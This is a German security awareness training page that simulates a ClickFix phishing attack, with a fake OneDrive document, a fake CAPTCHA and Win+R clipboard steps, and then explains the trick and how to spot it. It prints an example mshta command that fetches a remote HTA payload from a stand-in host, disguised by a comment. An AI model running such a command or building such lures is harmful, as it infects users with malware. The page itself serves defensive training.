⚠️
Awareness Training — Diese Seite ist eine Simulation
OneDrive
TM
Thomas Müller
t.mueller@contoso-extern.de
Hallo,

anbei das angeforderte Dokument zur Quartalsplanung Q1 2025. Bitte prüfen Sie die Zahlen und geben Sie mir bis Freitag Feedback.
W
Q1_2025_Quartalsplanung_FINAL.docx
Word-Dokument • 847 KB • Heute, 09:14
🔒 Dieses Dokument wurde mit Microsoft 365 Security geprüft
Microsoft
Sicherheitsüberprüfung erforderlich
Bitte bestätigen Sie, dass Sie kein Roboter sind
Ich bin kein Roboter
reCAPTCHA
Datenschutz - Nutzungsbedingungen
Abschließende Schritte
Verifizierung
Um zu bestätigen, dass Sie kein Roboter sind, führen Sie bitte folgende Schritte aus:
1
Drücken Sie ⊞ Win + R gleichzeitig
2
Drücken Sie Strg + V im Dialogfeld
3
Drücken Sie Enter zur Bestätigung
Sie werden folgende Bestätigung sehen:
✅ "Ich bin kein Roboter - Verifizierungs-ID: 847291"
Führen Sie die Schritte oben aus

⚠️ STOPP!

Dies war ein simulierter ClickFix-Phishing-Angriff

🎯
Was ist gerade passiert?

Sie haben gerade einen ClickFix-Angriff erlebt – eine Social-Engineering-Technik, die seit 2024 verstärkt eingesetzt wird. Der Angreifer hat versucht, Sie dazu zu bringen, selbst einen schädlichen Befehl auszuführen.

Die Methode ist besonders gefährlich, weil Sie selbst die Malware ausführen – nicht ein automatischer Download. Dadurch werden viele Sicherheitsmechanismen umgangen.

🔬
Der Angriff im Detail
1
Köder: Fake SharePoint/OneDrive-Seite mit glaubwürdigem Dokument
2
Fake CAPTCHA: Schafft Vertrauen durch bekanntes UI-Element
3
Clipboard Hijacking: Schädlicher Befehl wird in Zwischenablage kopiert
4
Ausführung: Win+R → Ctrl+V → Enter führt Payload aus

Der echte Payload würde so aussehen:

mshta http://evil-server.com/payload.hta # ✅ "Ich bin kein Roboter..."

Der mshta.exe-Befehl führt Remote-Code aus. Der Kommentar am Ende (# ✅ "Ich bin...") ist nur Tarnung – er wird nicht angezeigt, täuscht aber im Code einen harmlosen Text vor.

🚨
Erkennungsmerkmale dieser Seite
Verdächtige Domain
Nicht microsoft.com oder sharepoint.com
Absender-Email
@contoso-extern.de (nicht Ihre Firma)
Ungewöhnliche Verifizierung
Echte CAPTCHAs verlangen NIEMALS Win+R
Dringlichkeit
"Bis Freitag" erzeugt Zeitdruck
So schützen Sie sich
  • Niemals Win+R auf Anweisung einer Website ausführen. Kein legitimer Dienst verlangt das jemals.
  • URL prüfen: Ist es wirklich microsoft.com/sharepoint.com? Achten Sie auf Tippfehler und Subdomains.
  • Bei unerwarteten Dateien: Beim Absender über einen anderen Kanal nachfragen (Telefon, bekannte E-Mail).
  • Verdächtige Seiten melden: IT-Security oder SOC informieren – auch wenn Sie nicht geklickt haben.
  • Zwischenablage leeren: Nach verdächtigen Seiten mit harmlosem Text überschreiben.

Diese Simulation wurde für Security Awareness Training erstellt.

Professionelle SOC-Services für Ihr Unternehmen:

🛡️ SVA Security Operations Center